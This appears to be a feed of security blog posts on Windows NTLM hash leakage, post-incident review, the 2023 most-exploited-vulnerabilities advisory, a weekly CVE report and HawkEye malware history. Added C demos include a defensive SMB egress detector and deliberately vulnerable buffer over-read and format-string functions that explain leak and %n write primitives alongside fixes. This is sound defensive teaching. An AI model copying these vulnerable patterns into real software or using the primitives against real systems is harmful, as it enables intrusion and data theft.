CVE-2024-43451 allows stealing NTLMv2 hash | Kaspersky official blog

With November’s Patch Tuesday Microsoft fixed 89 vulnerabilities in its products — two of which are being actively exploited. One of them — CVE-2024-43451 — is particularly alarming. It allows attackers to gain access to the victim’s NTLMv2 hash. Although it doesn’t have an impressive CVSS 3.1 rating (only 6.5 / 6.0), its exploitation requires minimal interaction from the user, and it exists thanks to the MSHTML engine — the legacy of Internet Explorer — which is theoretically deactivated and no longer used. Nevertheless, all current versions of Windows are affected by this vulnerability.

Why is CVE-2024-43451 so dangerous?

CVE-2024-43451 allows an attacker to craft a file that, once delivered to the victim’s computer, gives the attacker a way to steal the victim’s NTLMv2 hash. NTLMv2 is a challenge-response network authentication protocol used in Microsoft Windows environments. Strictly speaking, what leaks is the Net-NTLMv2 response that the victim’s machine produces when it tries to authenticate to an attacker-controlled server. That response cannot be passed directly the way a stored NT hash can in a pass-the-hash attack, but it can be relayed to other services that accept NTLM authentication, or cracked offline to recover the user’s password. Either way the attacker ends up able to authenticate on the network as a legitimate user without ever having been given the real credentials.

Of course, CVE-2024-43451 alone is not enough for a full-fledged attack — cybercriminals would have to use other vulnerabilities — but someone else’s NTLMv2 hash would make the attacker’s life much easier. At this point in time we have no additional information about scenarios that use CVE-2024-43451 in practice, but the vulnerability description clearly states that the vulnerability is publicly disclosed, and cases of exploitation have been detected in the wild.

What does “minimal interaction” mean?

It is generally assumed that if a user doesn’t open a malicious file — nothing bad can happen. In this case, that’s not true. According to the mini-FAQ in the security update guide advisory on CVE-2024-43451, exploitation may occur even when the user selects the file (single left-click), inspects it (with a right-click), or performs some “action other than opening or executing”.

What other vulnerabilities did Microsoft close in the November patch?

The second vulnerability that is already being exploited in real attacks is CVE-2024-49039. It allows attackers to escape from the AppContainer environment and, as a result, escalate their privileges to a Medium Integrity Level. In addition, there are two more holes that the company states are disclosed, although they’ve not yet been noticed in real attacks. These are CVE-2024-49019 in the Active Directory Certificate Service, which also allows the attacker to elevate privileges, and CVE-2024-49040 in Exchange, thanks to which malicious emails can be displayed with a fake sender address.

In addition, the critical vulnerability CVE-2024-43639, which allows remote code execution in Kerberos, also looks dangerous — though it only affects servers that are configured as a Kerberos Key Distribution Center (KDC) Proxy Protocol server.

How to stay safe?

In order to stay safe, we recommend, firstly, promptly installing updates for critical software (which, of course, includes the operating systems). In addition, it’s worth remembering that most attacks exploiting software vulnerabilities begin via email. Therefore, we recommend equipping all work devices with a reliable security solution, and not forget about protection at the mail gateway level.
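Whatever the trigger, the hash only leaves the network if the victim’s workstation is allowed to authenticate to an attacker-controlled host on the internet, typically over SMB when it follows a UNC path. A check worth adding alongside patching is therefore to block outbound SMB at the egress firewall and alert on any attempt. The C program below is an added example written for this page, not code from Kaspersky or Microsoft: it scans constructed firewall log lines (the src=, dst= and dport= field layout is an assumption about the log format) and flags internal hosts reaching public addresses on the SMB ports, including attempts the firewall already denied, since those still reveal which workstation was coaxed into authenticating outward.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample egress log lines (not from any real device). The
 * "src=IP dst=IP dport=N action=..." layout is an assumption. */
static const char *SAMPLE_LOG[] = {
    "2024-11-13T10:02:11Z src=10.1.4.22 dst=10.1.9.5 dport=445 action=allow",
    "2024-11-13T10:02:14Z src=10.1.4.22 dst=203.0.113.5 dport=445 action=allow",
    "2024-11-13T10:02:15Z src=10.1.4.22 dst=203.0.113.5 dport=80 action=allow",
    "2024-11-13T10:03:01Z src=10.1.4.31 dst=198.51.100.9 dport=139 action=deny",
    "2024-11-13T10:04:40Z src=10.1.4.31 dst=192.168.50.2 dport=445 action=allow",
    "2024-11-13T10:05:02Z src=10.1.4.40 dst=198.51.100.77 dport=443 action=allow",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* RFC 1918, loopback and link-local: destinations inside these ranges are
 * normal SMB/NTLM peers; anything else counts as "the internet" here. */
int is_private_ipv4(const char *ip)
{
    unsigned a, b, c, d;
    if (sscanf(ip, "%u.%u.%u.%u", &a, &b, &c, &d) != 4) return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255) return 0;
    if (a == 10) return 1;
    if (a == 172 && b >= 16 && b <= 31) return 1;
    if (a == 192 && b == 168) return 1;
    if (a == 127) return 1;
    if (a == 169 && b == 254) return 1;
    return 0;
}

/* Ports over which a Windows host silently sends an NTLM challenge response
 * when it follows a UNC path: SMB direct (445) and NetBIOS session (139).
 * WebDAV on 80/443 can carry NTLM too, but that needs the HTTP layer
 * inspected and is out of scope for this port-only check. */
int is_ntlm_carrier_port(unsigned port)
{
    return port == 445 || port == 139;
}

/* 1 if the line shows an internal host reaching a public address on an SMB
 * port, whatever the firewall verdict was: a "deny" still tells you which
 * workstation tried to authenticate somewhere it should not. */
int line_is_ntlm_egress(const char *line)
{
    char src[16], dst[16];
    unsigned dport;
    const char *p;

    p = strstr(line, "src=");   if (!p || sscanf(p + 4, "%15s", src) != 1) return 0;
    p = strstr(line, "dst=");   if (!p || sscanf(p + 4, "%15s", dst) != 1) return 0;
    p = strstr(line, "dport="); if (!p || sscanf(p + 6, "%u", &dport) != 1) return 0;

    return is_private_ipv4(src) && !is_private_ipv4(dst) && is_ntlm_carrier_port(dport);
}

/* Scan the embedded sample; returns how many lines were flagged. */
int count_ntlm_egress(void)
{
    int hits = 0;
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++) {
        if (line_is_ntlm_egress(SAMPLE_LOG[i])) {
            hits++;
            printf("ALERT possible NTLM hash leak: %s\n", SAMPLE_LOG[i]);
        }
    }
    return hits;
}

int main(void)
{
    int hits = count_ntlm_egress();
    printf("%d of %zu lines flagged\n", hits, SAMPLE_LOG_LEN);
    return 0;
}
```

Two of the six constructed lines are flagged: the allowed SMB connection to 203.0.113.5 and the denied NetBIOS attempt to 198.51.100.9. The port-80 line to the same public host is not, which is the caveat to remember: a WebDAV variant of the same leak needs inspection above the port layer.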

Kaspersky official blog – Read More

How to prevent company from getting hacked again | Kaspersky official blog

Serious cybersecurity incidents often impact many different parties — including those who don’t typically handle IT or security matters on a daily basis. Of course, the initial response needs to focus on identifying, containing, and recovering from an incident. But once the dust has settled, the time comes for another crucial stage: learning from the experience. What can the incident teach us? How can we improve our chances of preventing similar attacks in the future? These questions are well worth answering — even if the incident caused no significant damage due to an effective response or simply luck.

Involving people

Incident analysis is important for the whole organization. It’s crucial to involve not only IT and security teams but also senior management and IT system stakeholders, as well as any third-party vendors affected by the incident or involved in its response. A productive atmosphere is crucial. It’s important to emphasize that this isn’t a witch hunt (though mistakes will be discussed). Blame-shifting and manipulating information will only distort the picture, hinder analysis, and harm the organization’s long-term security.

Many companies keep incident details under wraps, fearing reputational damage or a repeat attack. While this is completely understandable, and certain details should indeed remain confidential, striving for maximum transparency in response is important. Specifics of an attack and response should be shared, if not with the general public, then at least with a trusted circle of peers in the cybersecurity field who can then help others prevent similar attacks on their organizations.

Detailed incident analysis

Although much incident data is already collected during the response phase, post-incident analysis provides an opportunity for deeper insights. First of all, answer questions like: How and when did the adversary penetrate the organization? What vulnerabilities and technical/organizational weaknesses were exploited? How did the attack unfold? Mapping attacker actions and response efforts on a timeline helps pinpoint when anomalies were detected, how they were identified, what response measures were taken, whether all relevant teams were promptly engaged, and if escalation scenarios were followed.

The answers to these questions should be documented meticulously, referencing factual data like SIEM logs, ticket creation timestamps in the task tracker, timestamps of emails being sent, and so on. This enables you to build a comprehensive and detailed picture, allowing for collective evaluation of both the speed and effectiveness of each response step.

It’s also necessary to separately assess an incident’s impact on other aspects of the business, such as continuity of operations, data integrity and leaks, financial losses (both direct and indirect), and company reputation. This will help balance the scale and cost of the incident against the scale and cost of measures to strengthen information security.

Identifying strengths and weaknesses

Technical incident reports may seem to contain all the information you need, but in reality they often lack crucial organizational context. A report might state that attackers accessed the system by exploiting a certain vulnerability, and that the organization needs to patch said vulnerability on all servers. However, this superficial analysis overlooks critical questions: How long did this vulnerability remain unpatched after it was disclosed? What other known vulnerabilities exist on the servers? What are the agreed-upon patching SLAs between IT and cybersecurity? Does vulnerability prioritization exist within the company?

Each stage and process affected by the incident deserves this level of scrutiny. This holistic approach allows you to assess the flaws in the security landscape that enabled the incident. It’s important not to focus solely on the negatives: if certain teams responded quickly and effectively or if existing processes/technologies aided in incident detection or mitigation, these aspects should also be analyzed to understand whether this positive experience can be applied elsewhere.

Human error and behavioral factors warrant special attention. What role did they play? Again, the goal isn’t to blame but to identify measures to mitigate or balance the inevitable impact of human factors in the future.

Planning for improvement

This is the most creative and organizationally challenging phase of the incident review. It requires developing effective, realistic steps to address weaknesses within resource constraints. Involving senior management in this process is especially beneficial — as the saying goes, cybersecurity budgets are never approved faster than after a major incident. Several aspects should be considered in the plan:

IT asset map update. The incident may have revealed a lot of new information about how the company’s data is processed and how processes are implemented in general. It’s often necessary to update priorities, reflecting a better understanding of which assets require the most protection.

Detection and response technologies. By analyzing which stages of the attack went undetected by defenders, and which technical measures were missing to stop the attack’s progression, the team can plan to implement additional security tools, such as EDR, SIEM, and NGFW. Sometimes it becomes clear that while the necessary tools seem to be in place, they lack automation (for example, automated response playbooks), or data streams (such as threat intelligence feeds). Or, perhaps, log storage practices facilitated their wholesale deletion by the attackers. Technology enhancements should receive special attention if the analysis showed that defenders spent an excessive amount of time manually searching for compromised hosts or other laborious tasks, lacked access to critical information, or didn’t have the tools for enterprise-wide response.

Processes and policies. Having determined whether the incident occurred due to violations of existing policies or their absence, it’s essential to address this by revisiting the entire chain of events, correcting any identified process deficiencies, and reflecting these corrections in the security policy. Ranging from processes, policies, and regulatory timelines for vulnerability and account management, to incident response playbooks, the revised company processes should make a repeat of the same kind of incident far less likely; no process change guarantees prevention outright.

The overall incident response plan should also be updated and refined based on practical experience. It’s important to clarify which parties were unable to fully participate in the process, and how to organize rapid communication between them to ensure swift decision-making in emergencies.

Proactive measures: technology. Incidents provide an opportunity to take a fresh look at existing practices for account management and patch management. Step-by-step improvements should be planned in areas where the company hasn’t followed best practices: implementing the principle of least privilege and centralized identity management, and prioritizing and systematically addressing key infrastructure vulnerabilities.

Proactive measures: people. Each human error requires corrective measures — targeted training or even drills tailored to individual roles. It’s worth discussing what training is necessary for specific individuals, departments, or the entire organization. A major incident can be a powerful wake-up call, emphasizing the importance of information security and driving engagement in cybersecurity awareness training, even among those who usually downplay its importance.

Following updated processes may be more challenging — requiring a special effort in training. Reminders from management and an incentive program may be necessary to ensure the updated regulations are fully adopted.

Preparing for the next incident

All of the measures listed above will enhance cybersecurity resilience, and readiness for incidents — in theory. But to be sure of the result, it’s worth validating their effectiveness through cybersecurity exercises, penetration testing, or red teaming. These simulations of real cyber-incidents serve different purposes, so which combination is most suitable depends on the organization and the measures taken post-incident.

Implementing all the improvements and updated security measures can be a lengthy, phased process, so regular meetings with all involved parties are necessary to collect feedback, discuss implementation, address challenges, and explore further security enhancements. To ensure these meetings are not mere empty talk, it’s essential to agree on specific metrics and milestones to track progress effectively.


Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023

Cyber Security

Key Takeaways  

  • Commonly exploited products in 2023 include Citrix NetScaler, Fortinet FortiOS, and Atlassian Confluence, with attacks involving remote code execution, buffer overflows, and session token leakage. 

  • The advisory was coauthored by international agencies, including ACSC, CISA, the FBI, and cybersecurity bodies from Canada, New Zealand, and the UK, highlighting global collaboration in combating cyber threats. 

  •  Exploited vulnerabilities often stem from code injection, buffer overflows, and improper input validation, emphasizing the need for secure coding practices. 

  • Organizations should implement security by design, adopt secure software development frameworks, and prioritize patch management to protect against known vulnerabilities. 

  • The advisory recommends deploying tools like EDR systems and employing Zero Trust Network Architecture (ZTNA) to detect zero-day exploits and limit lateral movement within networks. 

Overview 

The Australian Cyber Security Center (ACSC) has issued an important cybersecurity advisory detailing a range of vulnerabilities in 2023. The report, which was coauthored by cybersecurity agencies from the United States, Australia, Canada, New Zealand, and the United Kingdom, provides a comprehensive overview of the vulnerabilities most targeted by cybercriminals, including the risks posed by zero-day exploits.  

The advisory aims to inform organizations worldwide about the growing cyber threat landscape and offers guidance to minimize the risks posed by these vulnerabilities. It identifies the most frequently exploited Common Vulnerabilities and Exposures (CVEs) of 2023 and their associated Common Weakness Enumerations (CWEs). 

This security advisory is a collaborative effort from cybersecurity agencies around the world, including the Australian Cyber Security Center (ACSC), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and cybersecurity agencies from Canada, New Zealand, and the United Kingdom.  

In particular, CISA has worked closely with international partners to monitor, identify, and mitigate common vulnerabilities, reinforcing their shared commitment to securing digital infrastructure. The FBI has also been actively involved in identifying cyber threat actors exploiting these vulnerabilities, especially those targeting critical infrastructure in both the public and private sectors.  

Key Findings: Zero-Day Exploits on the Rise 

One of the most concerning trends identified in the advisory is the increasing exploitation of zero-day vulnerabilities. These vulnerabilities, which are unknown to the software vendor or the public at the time of exploitation, allow attackers to bypass security defenses and gain unauthorized access to systems.  

In 2023, malicious actors exploited zero-day vulnerabilities before patches were available, and kept targeting the same flaws in the period immediately after disclosure, when many systems were still unpatched. Notably, these exploits were used to compromise high-value targets, including organizations in critical sectors such as healthcare, finance, and government. 

The ACSC’s advisory highlights that reducing the lifespan of zero-day exploits can be achieved by improving security lifecycles and ensuring responsible vulnerability disclosure. Both vendors and developers are urged to adopt secure-by-design principles and frameworks like the SP 800-218 Secure Software Development Framework (SSDF) to enhance the security of software from the ground up. 

Top Vulnerabilities Exploited in 2023 

The advisory identifies several CVEs that were routinely exploited in 2023. Among the most frequently targeted vulnerabilities are: 

These vulnerabilities were exploited by a variety of cyber threat actors, including advanced persistent threat (APT) groups and ransomware operators. For instance, CVE-2023-34362, which affects the MOVEit Transfer product, was actively targeted by the CL0P ransomware gang. Similarly, CVE-2023-22515 in Atlassian Confluence was exploited by threat actors to gain unauthorized access to corporate networks, compromising sensitive data.

In many cases, these exploits were used to execute remote code, bypass authentication, or escalate privileges within affected systems. These vulnerabilities often result in significant disruption, financial loss, and reputational damage to affected organizations. 

Common Weakness Enumerations (CWEs) 

The advisory also sheds light on the associated Common Weakness Enumerations (CWEs) that underlie many of the vulnerabilities exploited in 2023. For example: 

  • CWE-94, code injection: the weakness class assigned to CVE-2023-3519 in Citrix NetScaler, an unauthenticated remote code execution flaw. 
  • CWE-119, buffer overflow (in this case a buffer over-read): CVE-2023-4966 in Citrix NetScaler, which leaks session tokens. 
  • CWE-20, improper input validation: CVE-2023-22515 in Atlassian Confluence, which let attackers create unauthorized administrator accounts. 

By understanding the CWEs associated with these CVEs, organizations can implement more targeted defenses to mitigate the risk of exploitation. Developers are encouraged to adopt practices that prevent these weaknesses from being introduced in the first place, such as using memory-safe languages and conducting regular security testing. 
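The CWE-119 entry above is worth a closer look because the Citrix case is a buffer over-read rather than a classic overflow: the server hands the network layer more bytes than it actually wrote, and whatever sits after the buffer goes out on the wire. The C program below is an added illustration of that weakness class and is not Citrix’s code; the struct layout, the field names and the session token value are constructed for the demo. It shows a common trigger, trusting snprintf’s return value (the length the output would have had, not the bytes stored) as the send length, next to the clamped version.

```c
#include <stdio.h>
#include <string.h>

#define RESP_SIZE 32

/* Constructed server-side layout: the response buffer sits directly before
 * a value that must never reach the client. */
struct conn_state {
    char resp[RESP_SIZE];
    char session_token[16];
};

/* A client-controlled host name longer than the buffer (50 bytes). */
static const char LONG_HOST[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA";

/* Vulnerable: snprintf returns the length the output WOULD have had, not
 * what it stored. Returning it as the send length over-reads resp whenever
 * the host is long (CWE-119, buffer over-read). */
size_t build_response_vuln(struct conn_state *cs, const char *host)
{
    int n = snprintf(cs->resp, sizeof cs->resp, "Host: %s\r\n", host);
    return n < 0 ? 0 : (size_t)n;            /* BUG: can exceed sizeof cs->resp */
}

/* Fixed: report only what actually landed in the buffer. */
size_t build_response_fixed(struct conn_state *cs, const char *host)
{
    int n = snprintf(cs->resp, sizeof cs->resp, "Host: %s\r\n", host);
    if (n < 0) return 0;
    if ((size_t)n >= sizeof cs->resp) return sizeof cs->resp - 1;  /* truncated */
    return (size_t)n;
}

/* Length each variant would hand to send(). */
size_t reported_length(const char *host, int use_fixed)
{
    struct conn_state cs;
    memset(&cs, 0, sizeof cs);
    return use_fixed ? build_response_fixed(&cs, host) : build_response_vuln(&cs, host);
}

/* Simulates send(cs.resp, len): copies len bytes starting at the beginning of
 * the struct (resp is at offset 0), exactly as a socket write would, and
 * reports whether the token ended up among the outgoing bytes. */
int response_leaks_token(const char *host, int use_fixed)
{
    struct conn_state cs;
    unsigned char wire[sizeof cs];
    size_t len, i;

    memset(&cs, 0, sizeof cs);
    memcpy(cs.session_token, "SESSION-SECRET-1", sizeof cs.session_token);

    len = use_fixed ? build_response_fixed(&cs, host) : build_response_vuln(&cs, host);
    if (len > sizeof cs) len = sizeof cs;    /* demo guard: never read outside cs */
    memcpy(wire, &cs, len);

    for (i = 0; i + 7 <= len; i++)
        if (memcmp(wire + i, "SESSION", 7) == 0) return 1;
    return 0;
}

int main(void)
{
    printf("vuln  reports %zu bytes, leaks token: %d\n",
           reported_length(LONG_HOST, 0), response_leaks_token(LONG_HOST, 0));
    printf("fixed reports %zu bytes, leaks token: %d\n",
           reported_length(LONG_HOST, 1), response_leaks_token(LONG_HOST, 1));
    return 0;
}
```

With the 50-byte host name the vulnerable variant reports 58 bytes and the simulated send carries the token, while the fixed variant reports 31 and never leaves the buffer. The guard that caps len at sizeof cs exists only so the example stays within defined behaviour; a real send() would read whatever follows the struct, which is exactly why over-reads of this kind leak unrelated memory.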

Recommendations for Vendors, Developers, and End-Users 

In response to these findings, the advisory provides several key recommendations for organizations and developers to enhance their cybersecurity posture and reduce the risk of exploitation: 

  • Vendors are encouraged to integrate security into the development process from the start, using frameworks like SP 800-218 SSDF to guide their efforts. 

  • Developers should ensure that vulnerabilities are disclosed responsibly, including the root causes and associated CWEs, to help the broader community implement effective mitigation measures. 

  • Regularly applying patches is critical to mitigating known vulnerabilities. End-users should also implement centralized patch management systems to streamline the process and ensure that vulnerabilities are addressed promptly. 

  • Security tools like EDR systems help detect exploitation of zero-day vulnerabilities, for which no patch exists yet. Organizations should prioritize their deployment to help identify suspicious activities and mitigate risks before they escalate. 

  • Organizations are urged to have up-to-date incident response plans in place and ensure that system backups are securely stored and regularly tested to recover from potential attacks. 

Conclusion 

The Australian Cyber Security Center (ACSC), in partnership with CISA, the FBI, and other international cybersecurity agencies, is calling on vendors, developers, and end-users to take immediate action to address these vulnerabilities and enhance their overall cybersecurity posture.  

By following the advisory’s recommendations, organizations can reduce their exposure to cyber threats and strengthen their defenses against cyberattacks. The collaboration between global cybersecurity agencies emphasizes the importance of shared intelligence and international cooperation in the fight against cybercrime. 

The post Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023 appeared first on Cyble.

Blog – Cyble – Read More

IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million

CybleBlogs

Cyble Research and Intelligence Labs (CRIL) researchers investigated 18 vulnerabilities and 10 dark web exploits in the last week – including an actively exploited Fortinet vulnerability with nearly 1 million exposed assets on the internet.

Other vulnerabilities analyzed by Cyble affect third-party Windows drivers, SharePoint, Qualcomm, Android, QNAP and more.

Here are the vulnerabilities highlighted by Cyble as meriting high-priority attention by security teams.

CVE-2024-23113: FortiOS Format String Vulnerability

CVE-2024-23113 is a critical format string vulnerability affecting Fortinet’s FortiOS, specifically within the FGFM (FortiGate to FortiManager) service. The vulnerability could allow unauthenticated remote code execution (RCE) by malicious actors.

While the vulnerability dates from February, CISA added it to its Known Exploited Vulnerabilities (KEV) catalog last month, and Cyble researchers have seen multiple exploits and proofs of concept (PoC) targeting the vulnerability discussed on the dark web and in cybercrime forums.
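A format string vulnerability of the class described above arises when data from the peer is used as the format argument itself, so that %x and %n directives supplied by the peer read from and write to the server’s memory. The C program below is an added example written for this page, not Fortinet’s code, and nothing in it reflects how FGFM is implemented. In the real bug class the call has no argument list at all and the directives consume whatever sits in the argument registers or on the stack; to keep the demonstration defined behaviour, the example passes the two values such a call would otherwise pick up (a server-side value and a writable counter) explicitly. That is enough to show both halves of the primitive, a read that leaks the value and a %n write whose value the peer controls, next to the one-token fix.

```c
#include <stdio.h>
#include <string.h>

/* Constructed server-side value the peer should never see. */
#define SERVER_SECRET 0xdeadbeefUL

/* Vulnerable shape (CWE-134): the peer-supplied string IS the format.
 * Real-world instances look like snprintf(out, n, peer) or syslog(pri, peer);
 * the extra arguments here stand in for what the directives would otherwise
 * pull off the stack, so the behaviour stays defined for the demo. */
int format_vuln(char *out, size_t n, const char *peer,
                unsigned long stack_value, int *written)
{
    return snprintf(out, n, peer, stack_value, written);
}

/* Fixed: the format is a literal and the peer string is only ever data. */
int format_fixed(char *out, size_t n, const char *peer)
{
    return snprintf(out, n, "%s", peer);
}

/* Does the vulnerable call leak SERVER_SECRET into the output? */
int vuln_leaks_secret(const char *peer)
{
    char out[128];
    int written = 0;
    format_vuln(out, sizeof out, peer, SERVER_SECRET, &written);
    return strstr(out, "deadbeef") != NULL;
}

/* What value does a peer-controlled %n plant in memory? -1 if it never fires. */
int vuln_n_write_value(const char *peer)
{
    char out[128];
    int written = -1;
    format_vuln(out, sizeof out, peer, SERVER_SECRET, &written);
    return written;
}

/* The fixed path reproduces the peer string byte for byte, directives included. */
int fixed_is_verbatim(const char *peer)
{
    char out[128];
    format_fixed(out, sizeof out, peer);
    return strcmp(out, peer) == 0;
}

int main(void)
{
    printf("peer \"peer=%%lx\" leaks the secret: %d\n", vuln_leaks_secret("peer=%lx"));
    printf("peer \"%%lx%%n\" plants the value:   %d\n", vuln_n_write_value("%lx%n"));
    printf("fixed path keeps directives inert:  %d\n", fixed_is_verbatim("%lx%n"));
    return 0;
}
```

The peer string "%lx%n" prints the eight hex digits of the secret and then writes 8, the number of characters emitted so far, through the pointer %n consumes; in a real exploit the peer pads the output to choose that number and steers the pointer at something useful. The fix is the boring one, a literal "%s" format with the peer string as data. Compilers flag the vulnerable shape with -Wformat-security when no arguments follow a non-literal format, and -Wformat-nonliteral catches it even when some do; treating either as an error in CI is cheap insurance.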

Cyble’s ODIN vulnerability search tool has detected 978,000 vulnerable Fortinet instances:

Vulnerable IT assets detected by Cyble

CVE-2024-50550: LiteSpeed Cache plugin for WordPress

Another vulnerability with wide exposure is CVE-2024-50550, a critical privilege escalation vulnerability in LiteSpeed Cache plugin for WordPress, which is installed on over 6 million websites. Cyble honeypot sensors recently detected attacks on a different LiteSpeed vulnerability (CVE-2024-44000) and another WordPress plugin.

Cyble researchers said the new LiteSpeed vulnerability “could be leveraged to access backend databases as well as to install arbitrary plugins or sniffers, leading attackers to exfiltrate payment card data and sensitive information of users,” as well as altering web pages.

CVE-2021-41285 and CVE-2020-14979: Windows Drivers

CVE-2021-41285 and CVE-2020-14979 are high-severity vulnerabilities affecting the WinRing0.sys driver that could allow attackers to achieve local privilege escalation to NT AUTHORITY\SYSTEM on Windows systems. A newly identified malware called “SteelFox” has been observed mining cryptocurrency and stealing credit card data; it uses the “bring your own vulnerable driver” (BYOVD) technique, creating a service that loads the vulnerable WinRing0.sys driver and then abusing it to escalate privileges.

CVE-2024-38094: Microsoft SharePoint

CVE-2024-38094 is a high-severity remote code execution vulnerability affecting Microsoft SharePoint. Microsoft recently disclosed that the vulnerability is being exploited to gain initial access to corporate networks by attackers. Researchers also observed that attackers are targeting vulnerable SharePoint servers using publicly disclosed SharePoint proof-of-concept exploit code to plant a web shell that they later leverage to gain privileges and pivot into the compromised network.

CVE-2024-43047 and CVE-2024-43093: Android Kernel Components

CVE-2024-43047 is a high-severity use-after-free issue in closed-source Qualcomm components within the Android kernel that can lead to elevated privileges. CVE-2024-43093 is also a high-severity elevation of privilege flaw, impacting the Android Framework component and Google Play system updates, specifically in the Documents UI. Recently Google fixed both of the actively exploited zero-day flaws as part of its November security updates.

CVE-2024-8956 and CVE-2024-8957: PTZ Cameras

CVE-2024-8956 and CVE-2024-8957 impact PTZ cameras, which are extensively used in organizations around the world for applications such as live streaming, security surveillance, and conference automation. The critical vulnerabilities can also be chained by attackers to execute arbitrary OS commands on these devices, as well as access sensitive data such as usernames, password hashes, and device configuration details.

CVE-2024-10443: Synology NAS Devices

CVE-2024-10443 is a critical vulnerability in Synology’s BeeStation and DiskStation NAS devices, specifically within the BeePhotos and SynologyPhotos applications, which are designed to provide user-friendly personal cloud storage solutions. The vulnerability can allow remote attackers to execute arbitrary code. As NAS devices are commonly used to store sensitive data by both home and enterprise customers, Cyble researchers have assessed that attackers could attempt to leverage the vulnerability to breach the systems and steal data.

CVE-2024-50387: QNAP

CVE-2024-50387: This as-yet unclassified vulnerability, detailed in a QNAP advisory, was revealed at Pwn2Own 2024. It is a critical SQL injection (SQLi) vulnerability impacting QNAP’s SMB Service, the vendor’s implementation of the Server Message Block (SMB) protocol on QNAP NAS devices, which provides file sharing and network services to Windows and other operating systems.

Dark Web and Cybercrime Forum Exploits

Here are 7 vulnerabilities and exploits that Cyble researchers observed under active discussion on underground forums and Telegram channels, plus claims of zero-day vulnerabilities for sale in Palo Alto Networks and Microsoft products.

CVE-2024-6778: A high-severity vulnerability affecting the Chromium web browser prior to version 126.0.6478.182. The vulnerability arises from a race condition in the DevTools component. An attacker who convinces a user to install a malicious extension can use it to inject arbitrary scripts or HTML into privileged pages, thereby facilitating a sandbox escape.

CVE-2024-46538: A critical cross-site scripting (XSS) vulnerability identified in pfSense version 2.5.2. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a ‘crafted payload’ into the $pconfig variable, specifically through the ‘interfaces_groups_edit.php’ file.

CVE-2024-44193: A vulnerability affecting Apple iTunes for Windows, specifically versions prior to 12.13.3. The vulnerability allows local attackers to potentially elevate their privileges on affected systems, posing significant security risks.

CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.

CVE-2024-40711: A critical vulnerability in Veeam Backup & Replication software classified as a deserialization of untrusted data issue. This vulnerability allows unauthenticated remote code execution (RCE), enabling attackers to execute arbitrary code on affected systems without requiring any authentication.

CVE-2024-0311: A cybersecurity vulnerability identified in the Skyhigh Client Proxy, this flaw allows a malicious insider to bypass existing security policies without needing a valid release code, which can potentially lead to unauthorized access to sensitive data or applications.

CVE-2024-20419: The critical vulnerability affecting Cisco’s Smart Software Manager On-Prem (SSM On-Prem) arises from improper validation in the password change functionality, allowing unauthenticated remote attackers to change user passwords without prior knowledge of the existing password.

Cyble researchers also observed zero-day vulnerabilities being offered for sale on dark web forums, including a remote code execution (RCE) vulnerability in Palo Alto’s PAN-OS, and a local privilege escalation (LPE) vulnerability in Windows for which a threat actor was asking US$200,000 to $400,000. Palo Alto issued an advisory stating that it is aware of the PAN-OS claim.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million appeared first on Cyble.


HawkEye Malware: Technical Analysis

Editor’s note: The current article is authored by the threat researcher Aaron Jornet Sales, also known as RexorVc0. You can find him on X and LinkedIn. 

HawkEye, also known as PredatorPain (Predator Pain), is a malware categorized as a keylogger, but over the years, it has adopted new functionalities that align it with the capabilities of other tools like stealers.

History of HawkEye

HawkEye emerged before 2010, with records of its use and sale dating back to 2008, making it quite long-lived. After several spearphishing campaigns in which this well-known malware was attached, it gained significant popularity starting in 2013.

This keylogger has been available on various dark web sites, even having dedicated websites where the tool was sold. However, this keylogger has been cracked for years and used by different actors without going through the subscription method imposed by its creators, whose price ranged between $20 and $50. This has contributed to its continued notoriety, and it has been used not only by criminal actors but also by script kiddies due to its ease of use.

Although it is not one of the most widely used malware families, it remains in active use and saw a significant resurgence during the COVID period, when certain actors took advantage of the general hysteria to obtain company data through phishing campaigns.

Additionally, HawkEye has been used in conjunction with other loaders and/or malware that invoked this keylogger. Over its long trajectory, various actors and malware have been involved in attacks on companies, some of which include Galleon Gold, Mikroceen, the iSPY crypter related to Gold Skyline, Remcos used in campaigns alongside HawkEye, Pony used in campaigns alongside HawkEye, etc.

Technical Analysis

The method of HawkEye’s delivery has varied throughout its history, as have the types of sources behind the attacks. Nevertheless, it has been primarily involved in spearphishing campaigns, where attackers devised convincing scenarios to trick victims into downloading the malicious file, which could be a document, compressed file, or another malware acting as a loader for the keylogger.

